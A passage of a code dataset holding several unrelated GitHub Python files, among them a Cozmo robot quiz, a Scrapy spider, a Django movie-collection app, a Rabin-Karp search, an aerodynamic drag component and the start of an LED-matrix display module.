}\n\n moves = batch.moves\n if moves.ndim == 1:\n with torch.no_grad():\n argmax = torch.argmax(m_logits, dim=-1)\n match = argmax == moves\n metrics[\"acc@01\"] = match.float().mean().item()\n\n return (\n self.v_weight * v_error\n + self.policy_weight * F.cross_entropy(m_logits, moves)\n ), metrics\n","repo_name":"nelhage/taktician","sub_path":"python/tak/model/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"53"} +{"seq_id":"33425626591","text":"'''\nw와 h의 최대공약수가 1일 때 잘리는 박스는 w+h-1개\n그렇지 않을 때 잘리는 박스는 w+h-최대공약수 개\n'''\ndef solution(w,h):\n lst = []\n if w == h: return w*h-w\n elif w == 1 or h == 1: return 0\n\n for i in range(1,w+1):\n if w%i == 0: lst.append(i)\n for i in range(1,h+1):\n if h%i == 0: lst.append(i)\n\n for i in sorted(lst,reverse=True):\n if lst.count(i) == 2 and i>1:\n return (w*h)-(w+h-i)\n elif lst.count(i) == 2 and i==1:\n return (w*h)-(w+h-1)\n\nw, h = map(int,input().split())\nprint(solution(w,h))","repo_name":"Jihyeon0712/Programmers","sub_path":"2단계/Python_Code/2. 멀쩡한 사각형.py","file_name":"2. 멀쩡한 사각형.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38273845935","text":"import time\r\nimport asyncio\r\nimport xmltodict\r\nimport cozmo\r\nimport urllib.request\r\nimport urllib.parse\r\nfrom cozmo.objects import LightCube1Id, LightCube2Id, LightCube3Id\r\nfrom PIL import Image, ImageDraw, ImageFont\r\n\r\ndef retreive_student_questions(email, password):\r\n data = {}\r\n data[\"email\"] = email\r\n data[\"password\"] = password\r\n data[\"request\"] = \"chooseQuestion\"\r\n url_values = urllib.parse.urlencode(data)\r\n url = \"http://localhost:9000/cozmo\"\r\n full_url = url + \"?\" + url_values\r\n page = urllib.request.urlopen(full_url)\r\n data_dict = xmltodict.parse(page.read())\r\n\r\n structured_questions = {}\r\n \r\n for result in data_dict[\"sparql\"][\"results\"][\"result\"]:\r\n current_course = \"\"\r\n current_understanding = \"\"\r\n current_question = \"\"\r\n current_possible_answer = \"\"\r\n current_correct_answer = \"\"\r\n for binding in result[\"binding\"]:\r\n if(binding[\"@name\"] == \"courseLabel\"):\r\n current_course = binding[\"literal\"]\r\n if(binding[\"@name\"] == \"understanding\"):\r\n current_understanding = binding[\"literal\"]\r\n if(binding[\"@name\"] == \"question\"):\r\n current_question = binding[\"literal\"][\"#text\"]\r\n if(binding[\"@name\"] == \"possibleAnswer\"):\r\n current_possible_answer = binding[\"literal\"][\"#text\"]\r\n if(binding[\"@name\"] == \"correctAnswer\"):\r\n current_correct_answer = binding[\"literal\"][\"#text\"]\r\n\r\n #print(\"\\n\", current_course, \"\\n\", current_understanding, \"\\n\", current_question[\"#text\"], \"\\n\", current_possible_answer[\"#text\"], \"\\n\", current_correct_answer[\"#text\"])\r\n\r\n if((current_course, current_understanding) not in structured_questions):\r\n structured_questions[(current_course, current_understanding)] = {}\r\n \r\n if(current_question not in structured_questions[(current_course, current_understanding)]):\r\n structured_questions[(current_course, current_understanding)][current_question] = {}\r\n \r\n structured_questions[(current_course, current_understanding)][current_question][current_possible_answer] = False\r\n\r\n structured_questions[(current_course, current_understanding)][current_question][current_correct_answer] = True\r\n\r\n return structured_questions\r\n\r\ndef construct_cozmo_quiz(robot, structured_quiz_data, isRandomized):\r\n chosen_course = (\"\", \"11000\")\r\n chosen_question = \"\"\r\n chosen_incorrect_answers = list()\r\n chosen_correct_answer = \"\"\r\n\r\n for key in structured_quiz_data:\r\n if(int(key[1]) < int(chosen_course[1])):\r\n chosen_course = (key[0], key[1])\r\n\r\n if(chosen_course in structured_quiz_data):\r\n for question in structured_quiz_data[chosen_course]:\r\n if(chosen_question == \"\"):\r\n chosen_question = question\r\n\r\n for answer in structured_quiz_data[chosen_course][chosen_question]:\r\n if(structured_quiz_data[chosen_course][chosen_question][answer]):\r\n chosen_correct_answer = answer\r\n else:\r\n chosen_incorrect_answers.append(answer)\r\n\r\n print(chosen_correct_answer)\r\n print(chosen_incorrect_answers)\r\n cozmo_ask_quiz_question_demo(robot, chosen_question, chosen_correct_answer, chosen_incorrect_answers[0], chosen_incorrect_answers[1])\r\n\r\ndef cozmo_lights(robot: cozmo.robot.Robot):\r\n cube1 = robot.world.get_light_cube(LightCube1Id) # looks like a paperclip\r\n cube2 = robot.world.get_light_cube(LightCube2Id) # looks like a lamp / heart\r\n cube3 = robot.world.get_light_cube(LightCube3Id) # looks like the letters 'ab' over 'T'\r\n\r\n if cube1 is not None:\r\n cube1.set_lights(cozmo.lights.red_light)\r\n else:\r\n cozmo.logger.warning(\"Cozmo is not connected to a LightCube1Id cube - check the battery.\")\r\n\r\n if cube2 is not None:\r\n cube2.set_lights(cozmo.lights.green_light)\r\n else:\r\n cozmo.logger.warning(\"Cozmo is not connected to a LightCube2Id cube - check the battery.\")\r\n\r\n if cube3 is not None:\r\n cube3.set_lights(cozmo.lights.blue_light)\r\n else:\r\n cozmo.logger.warning(\"Cozmo is not connected to a LightCube3Id cube - check the battery.\")\r\n\r\n # Keep the lights on for 10 seconds until the program exits\r\n time.sleep(10)\r\n\r\ndef make_text_image(text_to_draw, x, y, font=None):\r\n '''Make a PIL.Image with the given text printed on it\r\n\r\n Args:\r\n text_to_draw (string): the text to draw to the image\r\n x (int): x pixel location\r\n y (int): y pixel location\r\n font (PIL.ImageFont): the font to use\r\n\r\n Returns:\r\n :class:(`PIL.Image.Image`): a PIL image with the text drawn on it\r\n '''\r\n\r\n # make a blank image for the text, initialized to opaque black\r\n text_image = Image.new('RGBA', cozmo.oled_face.dimensions(), (0, 0, 0, 255))\r\n\r\n # get a drawing context\r\n dc = ImageDraw.Draw(text_image)\r\n\r\n # draw the text\r\n dc.text((x, y), text_to_draw, fill=(255, 255, 255, 255), font=font)\r\n\r\n return text_image\r\n\r\ndef text_to_face(robot, text):\r\n text_image = make_text_image(text, 0, 0, ImageFont.truetype(\"arial.ttf\", 35))\r\n oled_face_data = cozmo.oled_face.convert_image_to_screen_data(text_image)\r\n return robot.display_oled_face_image(oled_face_data, 1000, in_parallel=True)\r\n\r\ndef cozmo_correct_answer_response(robot: cozmo.robot.Robot):\r\n action1 = robot.play_anim_trigger(cozmo.anim.Triggers.BuildPyramidThirdBlockUpright, in_parallel=True)\r\n \r\n cube1 = robot.world.get_light_cube(LightCube1Id) # looks like a paperclip\r\n cube2 = robot.world.get_light_cube(LightCube2Id) # looks like a lamp / heart\r\n cube3 = robot.world.get_light_cube(LightCube3Id) # looks like the letters 'ab' over 'T'\r\n\r\n cube1.set_lights(cozmo.lights.green_light)\r\n cube2.set_lights(cozmo.lights.green_light)\r\n cube3.set_lights(cozmo.lights.green_light)\r\n\r\n time.sleep(0.1)\r\n\r\n cube1.set_lights(cozmo.lights.off_light)\r\n cube2.set_lights(cozmo.lights.off_light)\r\n cube3.set_lights(cozmo.lights.off_light)\r\n\r\n time.sleep(0.1)\r\n\r\n cube1.set_lights(cozmo.lights.green_light)\r\n cube2.set_lights(cozmo.lights.green_light)\r\n cube3.set_lights(cozmo.lights.green_light)\r\n\r\n time.sleep(0.1)\r\n\r\n action1.wait_for_completed()\r\n\r\n robot.say_text(\"Kor Rect\", voice_pitch=0.6).wait_for_completed()\r\n\r\ndef cozmo_incorrect_answer_response(robot: cozmo.robot.Robot):\r\n action1 = robot.play_anim_trigger(cozmo.anim.Triggers.MajorFail, in_parallel=True)\r\n \r\n cube1 = robot.world.get_light_cube(LightCube1Id) # looks like a paperclip\r\n cube2 = robot.world.get_light_cube(LightCube2Id) # looks like a lamp / heart\r\n cube3 = robot.world.get_light_cube(LightCube3Id) # looks like the letters 'ab' over 'T'\r\n\r\n cube1.set_lights(cozmo.lights.red_light)\r\n cube2.set_lights(cozmo.lights.red_light)\r\n cube3.set_lights(cozmo.lights.red_light)\r\n\r\n time.sleep(0.1)\r\n\r\n cube1.set_lights(cozmo.lights.off_light)\r\n cube2.set_lights(cozmo.lights.off_light)\r\n cube3.set_lights(cozmo.lights.off_light)\r\n\r\n time.sleep(0.1)\r\n\r\n cube1.set_lights(cozmo.lights.red_light)\r\n cube2.set_lights(cozmo.lights.red_light)\r\n cube3.set_lights(cozmo.lights.red_light)\r\n\r\n time.sleep(0.1)\r\n\r\n action1.wait_for_completed()\r\n\r\n robot.say_text(\"Try a gain\", voice_pitch=0.8).wait_for_completed()\r\n\r\ndef cozmo_ask_quiz_question_demo(robot: cozmo.robot.Robot, question, correct_answer, incorrect_answer_1, incorrect_answer_2):\r\n cube1 = robot.world.get_light_cube(LightCube1Id) # looks like a paperclip\r\n cube2 = robot.world.get_light_cube(LightCube2Id) # looks like a lamp / heart\r\n cube3 = robot.world.get_light_cube(LightCube3Id) # looks like the letters 'ab' over 'T'\r\n\r\n Cubes = [cube1, cube2, cube3]\r\n\r\n robot.say_text(question, voice_pitch=0.8).wait_for_completed()\r\n\r\n robot.say_text(\"Is it\", voice_pitch=0.8).wait_for_completed()\r\n answer1_action_1 = robot.say_text(incorrect_answer_1, voice_pitch=0.8, in_parallel=True)\r\n answer1_action_2 = text_to_face(robot, incorrect_answer_1)\r\n cube1.set_lights(cozmo.lights.blue_light)\r\n answer1_action_1.wait_for_completed()\r\n answer1_action_2.wait_for_completed()\r\n cube1.set_lights(cozmo.lights.off_light)\r\n\r\n robot.say_text(\"Is it\", voice_pitch=0.8).wait_for_completed()\r\n answer2_action_1 = robot.say_text(correct_answer, voice_pitch=0.8, in_parallel=True)\r\n answer2_action_2 = text_to_face(robot, correct_answer)\r\n cube2.set_lights(cozmo.lights.blue_light)\r\n answer2_action_1.wait_for_completed()\r\n answer2_action_2.wait_for_completed()\r\n cube2.set_lights(cozmo.lights.off_light)\r\n\r\n robot.say_text(\"Or is it\", voice_pitch=0.8).wait_for_completed()\r\n answer3_action_1 = robot.say_text(incorrect_answer_2, voice_pitch=0.8, in_parallel=True)\r\n answer3_action_2 = text_to_face(robot, incorrect_answer_2)\r\n cube3.set_lights(cozmo.lights.blue_light)\r\n answer3_action_1.wait_for_completed()\r\n answer3_action_2.wait_for_completed()\r\n cube3.set_lights(cozmo.lights.off_light)\r\n\r\n last_cube1_tap = cube1.last_tapped_robot_timestamp\r\n last_cube2_tap = cube2.last_tapped_robot_timestamp\r\n last_cube3_tap = cube3.last_tapped_robot_timestamp\r\n\r\n while(not (cube1.last_tapped_robot_timestamp != last_cube1_tap or cube2.last_tapped_robot_timestamp != last_cube2_tap or cube3.last_tapped_robot_timestamp != last_cube3_tap)):\r\n time.sleep(0.0001)\r\n\r\n for cube in Cubes:\r\n if(cube.last_tapped_robot_timestamp):\r\n if(cube == cube2):\r\n cozmo_correct_answer_response(robot)\r\n else:\r\n cozmo_incorrect_answer_response(robot)\r\n\r\ndef begin_demo(robot: cozmo.robot.Robot):\r\n data = retreive_student_questions(\"johndoe2020@gmail.com\", \"passpass\")\r\n construct_cozmo_quiz(robot, data, False)\r\n\r\ncozmo.run_program(begin_demo)\r\n","repo_name":"angelson1992/TippaDemo","sub_path":"CozmoManager.py","file_name":"CozmoManager.py","file_ext":"py","file_size_in_byte":9929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"545377368","text":"import scrapy\nfrom ..items import FaceItem, GameInfo\n\nclass GameUrlSpider(scrapy.Spider):\n name = 'gameurl'\n\n def start_requests(self):\n url = 'file:///Users/siskon/Desktop/2013SQL.html'\n yield scrapy.Request(url=url, callback=self.parse_table)\n\n def parse_table(self, response):\n rows = response.css('#query_result_main tr')[1:5]\n for row in rows:\n print('Collecting game: ', row.xpath('td[2]/text()').get())\n url = row.xpath('td[4]/text()').get()\n print(url)\n if url is not None:\n yield scrapy.Request(url = 'http://' + url + '&gc=gc', \n meta = GameInfo(name=row.xpath('td[1]/text()').get()),\n callback = self.collect_image)\n \n def collect_image(self, response):\n srcs = response.css('table a+img::attr(src)').getall()\n srcs = [response.urljoin(src) for src in srcs]\n for src in srcs:\n print(src)\n yield FaceItem(image_urls=srcs, meta=response.meta,\n name=response.url.split('=')[-1])","repo_name":"SiskonEmilia/Anime-Wifu-Dataset","sub_path":"spider/dataset/spiders/gameurl_spider.py","file_name":"gameurl_spider.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"5596153648","text":"# s1 = {(3,3),[[0,1,0],[0,1,0],[1,1,1]]}\n\n'''\ntable size 6x8\n\n\n**blocks**\nb0 : 1x1\no\n\nb1 : 3x3\nxox\nxox\nooo\n\nb2 : 3x3\nxox\nooo\nxox\n\nb3 : 3x3\noxx\noox\nxoo\n\nb4 : 3x2\noo\nox\nox\n\nb5 : 2x4\nooxx\nxooo\n\nb6 : 2x4\noooo\nxoxx\n\nb7 : 2x3\nxxo\nooo\n\nb8 : 3x3\nxox\nooo\nxxo\n\nb9 :5x1\no\no\no\no\no\n\nb10 : 3x2\noo\nxo\nxo\n\n\n'''\n\nsize = (3,3)\nfor i in range(6):\n if i + size[0] > 6:\n continue\n for j in range(8):\n if j+size[1] > 8:\n continue\n print(i,j)\n","repo_name":"nomadlife/python-exercise","sub_path":"puzzle_solver_test.py","file_name":"puzzle_solver_test.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"ta","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11484281130","text":"import requests\nimport json\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.core.urlresolvers import reverse_lazy, reverse\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import permission_required\nfrom django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView\nfrom apps.movies.models import Movie, UserMovie\nfrom django.utils.decorators import method_decorator\nfrom hakloevno import settings\nfrom apps.movies.forms import MovieForm\n# Create your views here.\n\nAPI_URL = \"http://www.omdbapi.com/?\"\n\n#Mixins\n# http://brack3t.com/our-custom-mixins.html\nclass CheckPermMixin(object):\n permission_required = None\n login_url = settings.LOGIN_URL\n def dispatch(self, request, *args, **kwargs):\n has_permission = request.user.has_perm(self.permission_required)\n if not has_permission:\n messages.error(request, \"You don't have access to this app!\")\n return HttpResponseRedirect('%s?next=%s' % (self.login_url, self.request.path))\n return super(CheckPermMixin, self).dispatch(request, *args, **kwargs)\n\nclass IndexView(CheckPermMixin, ListView):\n template_name = 'movies/index.html'\n model = Movie\n # Required fields for CheckPermMixin\n permission_required = 'movies.view_movie'\n def get_queryset(self):\n # .order_by('?') is really expensive in large dbs, need fix\n return UserMovie.objects.filter(user=self.request.user).order_by('?')[:3]\n def get_context_data(self, **kwargs):\n context = super(IndexView, self).get_context_data(**kwargs)\n context.update({'movies': UserMovie.objects.filter(user=self.request.user).count()})\n context.update({'unseen': UserMovie.objects.filter(user=self.request.user, seen=False).count()})\n return context\n\nclass MovieDetailView(DetailView):\n model = UserMovie\n def get_object(self):\n return get_object_or_404(UserMovie, user=self.request.user, movie=Movie.objects.get(slug=self.kwargs.get('movie')))\n def get_context_data(self, **kwargs):\n context = super(MovieDetailView, self).get_context_data(**kwargs)\n return context\n\nclass BrowseView(CheckPermMixin, ListView):\n template_name = 'movies/movies_browse.html'\n model = UserMovie\n permission_required = 'movies.view_movie'\n context_object_name = 'movie_list'\n paginate_by = 10\n def get_queryset(self):\n return UserMovie.objects.filter(user=self.request.user)\n\n@permission_required('movies.add_movie')\ndef add_imdb(request, id):\n api_request = requests.get(API_URL + \"i=%s&plot=full&r=json\" % (id))\n if (api_request.status_code == requests.codes.ok):\n data = json.loads(api_request.text)\n if data.get('Response') == 'False':\n messages.error(self.request, 'No movie with the ID: %s found in the OMDb API' % (id))\n return HttpResponseRedirect(reverse('movies:index'))\n else:\n if Movie.objects.filter(title=data.get('Title', 'Unknown')).count():\n movie = Movie.objects.get(title=data.get('Title', 'Unknown'))\n else:\n movie = Movie(\n title=data.get('Title', 'Unknown'),\n year=data.get('Year', 'N/A'),\n plot=data.get('Plot', 'N/A'),\n rating=data.get('imdbRating', 'N/A'),\n runtime=data.get('Runtime', 'N/A'),\n poster_url=data.get('Poster', ''),\n imdb=id\n )\n movie.save()\n if not UserMovie.objects.filter(movie=movie, user=request.user).count():\n user_movie = UserMovie(\n movie = movie,\n user = request.user\n )\n user_movie.save()\n messages.success(request, '%s added to the collection' % movie.title)\n else:\n messages.error(request, 'You already have this movie in your collection')\n return HttpResponseRedirect(reverse('movies:movie_detail', args=(movie.slug,)))\n messages.error(request, 'Could not add movie, try again!') \n return HttpResponseRedirect(reverse('movies:index'))\n\nclass EditMovie(CheckPermMixin, UpdateView):\n model = UserMovie\n template_name_suffix = '_update_form'\n fields = ['last_seen',]\n permission_required = 'movies.change_movie'\n def get_object(self):\n return get_object_or_404(UserMovie, id=self.kwargs.get('id'))\n def form_valid(self, form):\n if self.get_object().user.id == self.request.user.id:\n self.object = form.save()\n messages.success(self.request, '%s updated' % self.object.movie.title)\n else:\n messages.error(self.request, 'This is not your movie to edit')\n return HttpResponseRedirect(reverse('movies:movie_detail', args=(self.object.movie.slug,)))\n\nclass DeleteMovie(CheckPermMixin, DeleteView):\n model = UserMovie\n permission_required = 'movies.delete_movie'\n success_url = reverse_lazy('movies:index') \n def get_object(self):\n return get_object_or_404(UserMovie, id=self.kwargs.get('id'))\n # Check possiblity to move the delete function to the model and remove UserMovie objects from there\n def delete(self, request, *args, **kwargs):\n self.object = self.get_object()\n if self.object.user.id == request.user.id:\n movie = self.object.movie.title\n if UserMovie.objects.filter(movie=self.object.movie).count() == 1:\n Movie.objects.get(slug=self.object.movie.slug).delete()\n # Automatically removes UserMovie-object\n else:\n UserMovie.objects.get(id=self.object.id).delete() \n messages.success(request, '%s successfully removed from collection' % movie)\n else:\n messages.error(request, 'This is not your movie to delete')\n return HttpResponseRedirect(self.get_success_url())\n\ndef search_imdb(request):\n context = {}\n query = request.GET.get('q', None)\n if query:\n context.update({'query': query})\n api_request = requests.get(API_URL + 's=%s&r=json' % (query))\n if (api_request.status_code == requests.codes.ok):\n data = json.loads(api_request.text)\n if data.get('Response') == 'False':\n messages.error(request, 'No search result from OBMb API')\n return HttpResponseRedirect(reverse('movies:index'))\n else:\n context.update({'movies': data.get('Search')})\n return render(request, 'movies/movie_search_imdb.html', context)\n\ndef search(request):\n context = {}\n query = request.GET.get('q', None)\n if query:\n context.update({'query': query})\n if len(query) > 3:\n context.update({'results': UserMovie.objects.filter(movie__title__icontains=query, user=request.user)})\n else:\n messages.error(request, 'The search query must be larger than 3 characters.')\n return render(request, 'movies/movie_search.html', context)\n","repo_name":"hakloev/old-hakloevno","sub_path":"apps/movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74797337766","text":"#!/usr/bin/env python3\n\nimport sys\n\n\nclass Solution:\n def strStr(self, haystack: str, needle: str) -> int:\n needle_size = len(needle)\n haystack_size = len(haystack)\n if (needle_size > haystack_size):\n return -1\n prime = 11\n hash_s = 0\n hash_t = 0\n left = 0\n right = needle_size - 1\n #so let's implement hash_s and hash_t (hash haystack and hash needle)\n for i in range(needle_size):\n hash_s += (ord(haystack[i]) * (prime ** i))\n hash_t += (ord(needle[i]) * (prime ** i))\n while right < haystack_size:\n #if hashes are equals we compare sliding window from left to right with needle\n if (hash_s == hash_t):\n if (haystack[left : right + 1] == needle):\n return (left)\n #we update the hash\n #we substract the value of the left char on the slinding window\n hash_s -= ord(haystack[left])\n #we divid the hash by prime\n hash_s //= prime\n #and if we are not on the end, we add the value of right + 1 char of the sliding window * (prime **(t_size - 1))\n if (right + 1 < haystack_size):\n hash_s += (ord(haystack[right + 1]) *(prime ** (needle_size - 1)))\n right += 1\n left += 1\n return (-1)\n\nsol = Solution()\nprint(sol.strStr(sys.argv[1], sys.argv[2]))","repo_name":"femifacia/algorithms","sub_path":"python/algorithms/find_the_index_of_the_first_occurence_in_a_string/main_rabbin_karp.py","file_name":"main_rabbin_karp.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"9345421740","text":"import numpy as np\n\nimport openmdao.api as om\n\n\nclass CD0Comp(om.ExplicitComponent):\n \"\"\" Computes the zero-lift drag coefficient\n \"\"\"\n def initialize(self):\n self.options.declare('num_nodes', types=int)\n\n def setup(self):\n nn = self.options['num_nodes']\n\n # Inputs\n self.add_input('mach', shape=(nn,), desc='Mach number', units=None)\n\n # Outputs\n self.add_output(name='CD0', val=np.zeros(nn), desc='zero-lift drag coefficient', units=None)\n\n # Jacobian\n ar = np.arange(nn)\n self.declare_partials(of='CD0', wrt='mach', rows=ar, cols=ar)\n\n def compute(self, inputs, outputs):\n M = inputs['mach']\n\n idx_low = np.where(M < 1.15)[0]\n idx_high = np.where(M >= 1.15)[0]\n\n outputs['CD0'][idx_low] = 0.013 + 0.0144 * (1.0 + np.tanh((M[idx_low] - 0.98) / 0.06))\n outputs['CD0'][idx_high] = 0.013 + \\\n 0.0144 * (1.0 + np.tanh(0.17 / 0.06)) - 0.011 * (M[idx_high] - 1.15)\n\n def compute_partials(self, inputs, partials):\n M = inputs['mach']\n\n idx_low = np.where(M < 1.15)[0]\n idx_high = np.where(M >= 1.15)[0]\n\n k = 50.0 / 3.0\n\n partials['CD0', 'mach'][idx_low] = 0.24 / (np.cosh(k * (M[idx_low] - 0.98))**2)\n partials['CD0', 'mach'][idx_high] = -0.011\n","repo_name":"OpenMDAO/dymos","sub_path":"dymos/examples/min_time_climb/aero/cd0_comp.py","file_name":"cd0_comp.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"53"} +{"seq_id":"20479807910","text":"from configparser import ConfigParser\nimport os\nimport sys\nimport pygame\nimport pygame.locals as pgl\nfrom PIL import Image\ntry:\n from .custom_virtual_gamepads import set_up_gamepad\nexcept (ImportError, SystemError) as e:#if doing screen test\n from custom_virtual_gamepads import set_up_gamepad\nimport signal\n\n\nCURRDIR = os.path.abspath(os.path.dirname(__file__))\nsys.path.append(os.path.join(CURRDIR, 'matrix','bindings','python'))\nfrom rgbmatrix import RGBMatrix, RGBMatrixOptions\n\n\ndef init_pygame_display(width, height):\n os.putenv('SDL_VIDEODRIVER', 'fbcon')\n os.environ[\"SDL_VIDEODRIVER\"] = \"dummy\"\n pygame.init()\n #pygame.display.set_mode((width, height), 0, 24)\n #return pygame.display.get_surface()\n return pygame.Surface((width, height))\n\n\ndef process_input_arg(argv):\n \"\"\"\n Returns a tuple of len 2.\n The first object is a string to a config file.\n The second argument is an integer for the demo. If set to 0, then the \n pygame surface will be sent to the matrix leds. Else, it will be outputed\n on the normal screen with a scaling factor.\n \"\"\"\n assert (len(argv)<4),\"maximum 2 arguments\"\n assert (len(argv)>1),\"needs at least one argument to the config file\"\n \n demo = 0\n configfile = ''\n for arg in argv:\n if \"--demo\" in arg:\n demo = arg.split('=')\n if len(demo) == 1:\n demo = 1\n elif len(demo) == 2:\n demo = int(demo[1])\n else: \n configfile = arg\n assert (os.path.isfile(configfile)), configfile+\" should be a path to the config file\"\n return configfile, demo\n \n\n\ndef get_config(configfile):\n \"\"\"\n configfile: path to a .ini file with the murapix configuration\n \n returns mapping, width, height, max_number_of_panels, led_rows\n \"\"\"\n config = ConfigParser()\n config.read(configfile)\n mapping = config.get('matrix','mapping')\n #first get number of holes\n number_of_holes = mapping.count('.')\n #then change mapping to a list of list\n mapping = mapping.split('\\n')\n mapping = [m.split(',') for m in mapping]\n #check if mapping is correctly configured\n good_size_col = all(len(mapping[m]) == len(mapping[m+1]) \n for m in range(len(mapping)-1))\n assert good_size_col, \"There should be the same number of panels per row\"\n number_of_rows = len(mapping)\n number_of_cols = len(mapping[0])\n max_number_of_panels = number_of_cols * number_of_rows - number_of_holes\n panel_numbering = list(range(1,max_number_of_panels+1))\n for i in range(number_of_rows):\n for j in range(number_of_cols):\n if '.' in mapping[i][j]:\n mapping[i][j] = None\n else:\n try:\n p_n = int(mapping[i][j])\n except: \n err_mess = 'mapping must contain either \".\" or integers'\n raise ValueError(err_mess)\n err_mess = \"Integers in mapping should form a sequence from 1 to \"+str(max_number_of_panels)\n assert (p_n in panel_numbering), err_mess\n mapping[i][j] = p_n\n panel_numbering.remove(p_n)\n err_mess = \"Missing integers in mapping: \"+str(panel_numbering)\n assert (len(panel_numbering)<1), err_mess\n \n led_rows = config.getint('matrix','led-rows')\n led_cols = config.getint('matrix','led-cols')\n assert (led_rows==led_cols), \"For now, murapix can only control square led panels\"\n #TODO: check if non-square pannels work\n width = number_of_cols * led_cols\n height = number_of_rows * led_rows\n \n if config.has_option('matrix','parallel'):\n parallel = config.getint('matrix','parallel')\n err_msg = (\"Each channel must have the same number of pannels:\\n\"\n \"{} total number of pannels for {} channels\".format(max_number_of_panels, \n parallel))\n assert max_number_of_panels%parallel == 0, err_msg\n else:\n parallel = 1\n \n return mapping, width, height, max_number_of_panels, led_rows, led_cols, parallel\n \n \ndef get_largest_rect(mapping, key='surface'):\n \"\"\"\n get the largest rectangle from the mapping of LED matrices.\n \n \"Largest\" maybe calculated by two methods:\n \"surface\": the rectangle with the largest surface\n \"diag\": the rectangle with the largest diagonal\n \"\"\"\n \n #https://stackoverflow.com/questions/19414673/in-numpy-how-to-efficiently-list-all-fixed-size-submatrices \n from numpy.lib.stride_tricks import as_strided\n from itertools import product \n import numpy as np\n m = np.array(mapping)\n l = product(range(m.shape[0],0,-1),range(m.shape[1],0,-1))\n if key=='surface':\n all_shapes = sorted(l, key=lambda row: row[0]*row[1],reverse=True)\n elif key=='diag':\n all_shapes = sorted(l, key=lambda row: row[0]**2+row[1]**2,reverse=True)\n else:\n raise ValueError('Key must be \"surface\" or \"diag\". {} was entered'.format(key))\n \n for sub_shape in all_shapes:\n view_shape = tuple(np.subtract(m.shape, sub_shape) + 1) + sub_shape\n arr_view = as_strided(m, view_shape, m.strides * 2)\n arr_view = arr_view.reshape((-1,) + sub_shape)\n for i in arr_view:\n if i.all():\n return i\n \ndef get_largest_rect_add(led_rows, m,n=None,key='surface'):\n \"\"\"\n Returns the pixel/led address of the largest rectangle using pygame standard:\n ((left, top), (width, height))\n \n \n ____\n usage\n ____\n \n If get_largest_rect was not called before, just insert the mapping. You\n may indicate the calculation method\n >>> (left, top), (width, height) = get_largest_rect_add(led_rows,mapping)\n >>> (left, top), (width, height) = get_largest_rect_add(led_rows,mapping,key='diag')\n In case the largest rectangle is already known, insert both\n >>> (left, top), (width, height) = get_largest_rect_add(led_rows,mapping,rec)\n \n \"\"\"\n import numpy as np\n if n is None:\n n = get_largest_rect(m,key=key)\n if type(m) is not np.ndarray:\n m = np.array(m)\n \n top, left = (np.argwhere(m==n[0][0])*led_rows).flatten().tolist()\n _t, _l = ((1+np.argwhere(m==n[-1][-1]))*led_rows).flatten().tolist()\n width, height = _l-left, _t-top\n \n \n return ((left, top),(width, height))\n \ndef get_deadzone_addresses(mapping, led_rows):\n \"\"\"\n Yields a list of ((left, top), (width, height)) for each square where\n there is a dead zone in the mapping, i.e. no LED in the matrix.\n \"\"\"\n for i, n in enumerate(mapping):#x, rows\n for j, m in enumerate(n):#y, panel number\n if m is not None:\n continue\n #rectangle to extract from the width*height scratch surface\n yield ((led_rows*j,led_rows*i),(led_rows,led_rows))\n\n\ndef get_panel_adresses(mapping, led_rows):\n \"\"\"\n Yields a list of ((left, top), (width, height)) for each square where\n there is a panel in the mapping.\n \"\"\"\n for i, n in enumerate(mapping):#x, rows\n for j, m in enumerate(n):#y, panel number\n if m is None:\n continue\n #rectangle to extract from the width*height scratch surface\n yield ((led_rows*j,led_rows*i),(led_rows,led_rows))\n\n\n\nclass Murapix:\n \"\"\"\n Create a subclass to use Murapix\n \n The screen surface on which you need to blit the sprites is self.scratch.\n \n Murapix has the following properties:\n self.mapping: how the different LED panels are put in place\n self.demo: 0 if going to the LED panels, a positive int if it is going to the standart screen\n self.width: the total width of the rectangle enclosing all panels in pixel \n self.height: the total height of the rectangle enclosing all panels in pixel\n self.max_number_of_panels: the number of panels\n self.led_rows: the number of pixel for both height and width of the panels\n self.scratch: the total pygame surface which is going to be processed by the murapix draw methods to either go the LED panels or, in demo mode, to the standart screen.\n self.gamepad: None by default. If set to a path string pointing to an SVG, will start the virtual gamepad\n \"\"\"\n def __init__(self):\n configfile, demo = process_input_arg(sys.argv)\n (mapping, width, height, max_number_of_panels, \n led_rows, led_cols, parallel) = get_config(configfile)\n self.RUNNING = True\n self.mapping = mapping\n self.demo = demo\n self.width = width\n self.height = height\n self.max_number_of_panels = max_number_of_panels\n self.led_rows = led_rows\n self.led_cols = led_cols\n self.parallel = parallel\n self.scratch = pygame.Surface((width, height))\n self.gamepad = None\n \n \n #signal handlers to quite gracefully\n signal.signal(signal.SIGINT, self.quit_gracefully)\n signal.signal(signal.SIGTERM,self.quit_gracefully)\n print(\"\"\" murapix Copyright (C) 2019 hy@amani.eu\n This program comes with ABSOLUTELY NO WARRANTY.\n This is free software, and you are welcome to redistribute it\n under certain conditions.\"\"\")#LICENSE\n \n if not demo:\n #must be a raspberry pi configured for murapix, hence nodename\n #must be \"rpi-murapix\"\n if os.uname().nodename not in (\"rpi-murapix\",\"raspberrypi\"):\n raise EnvironmentError(\"Not a murapix, please select demo mode with --demo=X\")\n \n print('Going on the Murapix!')\n print('{0} channel(s) of [{1}*{2}={3} 